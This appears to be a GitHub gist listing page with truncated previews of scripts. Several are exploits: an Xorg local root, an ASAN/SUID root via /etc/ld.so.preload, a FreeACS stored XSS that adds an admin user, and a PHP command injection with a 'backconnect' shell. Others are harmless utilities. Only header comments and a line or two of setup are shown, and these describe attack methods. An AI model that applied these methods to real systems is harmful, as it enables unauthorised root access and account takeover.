This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# x0rg - Xorg Local Root Exploit | |
# Released under the Snitches Get Stitches Public Licence. | |
# props to prdelka / fantastic for the shadow vector. | |
# Gr33tz to everyone in #lizardhq and elsewhere <3 | |
# ~infodox (25/10/2018) | |
# FREE LAURI LOVE! | |
echo "x0rg" | |
echo "[+] First, we create our shell and library..." | |
cat << EOF > /tmp/libhax.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# unsanitary.sh - ASAN/SUID Local Root Exploit | |
# Exploits er, unsanitized env var passing in ASAN | |
# which leads to file clobbering as root when executing | |
# setuid root binaries compiled with ASAN. | |
# Uses an overwrite of /etc/ld.so.preload to get root on | |
# a vulnerable system. Supply your own target binary to | |
# use for exploitation. | |
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363 | |
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#******************************************************************** | |
# CONFIGURAGION FILE FOR ADCD Z/OS 1.10 SUMMER * | |
#******************************************************************** | |
# FOR ALL THE LOADPARM OPTIONS VISIT: * | |
# http://dtsc.dfw.ibm.com/MVSDS/'HTTPD2.ADCD.GLOBAL.HTML(READ110S)' * | |
#******************************************************************** | |
# CUSTOM LOADPARM OPTIONS * | |
# SA - LOADS ALL LIBRARIES AND STARTS UP AUTOMATION (JES2) * | |
# J3 - LOADS ALL LIBRARIES AND STARTS UP BASIC z/OS SYSTEM (JES3) * | |
#******************************************************************** |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# SEE YOU SPACE COWBOY by DANIEL REHN (danielrehn.com) | |
# Displays a timeless message in your terminal with cosmic color effects | |
# Usage: add "sh ~/seeyouspacecowboy.sh; sleep 2" to .bash_logout (or similar) in your home directory | |
# (adjust the sleep variable to display the message for more seconds) | |
# Cosmic color sequence |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "SSH hangup user tool. For killing other users connections." | |
if [ $# -eq 0 ] | |
then | |
echo "use: $0 <PTS number to kill>" | |
exit | |
fi | |
echo "Terminating PTS/$1" | |
OWNER=$(stat -c '%U' /dev/pts/$i) | |
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# worlds cheapest exploit - made by copypasting from stackoverflow. | |
# released at BSides Edinburgh. | |
# Exploits freeacs - freeacs.com | |
# TL;DR: | |
# - Persistent XSS via CWMP Notify message | |
# - XSS fires in admin session and adds a user | |
# HACK THE PLANET! | |
# Darren Martyn - @info_dox - 7th March 2017 | |
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
# coding: utf-8 | |
# Example of how not to code PHP... Not a serious exploit, just one for fun as | |
# an example of how fucking badly people screw up. Picked an app while githubbin' | |
# and heres the ruinage. | |
# Exploits trivial command injection, followed by abusing the lolsudo implemented. | |
# Seriously, this dudes programming licence needs to be revoked. | |
# BONUS: Includes SCTP Backconnect for Great Justice reasons :D | |
# Screenshot: http://i.imgur.com/0CWDs8m.png | |
# Twitter: @dailydavedavids |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
# coding: utf-8 | |
# implements: https://twitter.com/twisteddoodles/status/863474505808846848 | |
# we import some random | |
import random | |
# first, we create our arrays, and pick random words from them and store. | |
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"]) | |
b = random.choice(["escape", "make love to", "smother", "dance with"]) | |
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"]) | |
d = random.choice(["disco", "airport", "changing room", "tumble dryer"]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU | |
usermode emulation (seems I pushed an old version), and removed debug output. | |
------------------------- | |
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION! | |
If anyone wants to fix this, go ahead (no pun intended). | |
However, I don't have a vulnerable product and am unwilling to acquire one. |
NewerOlder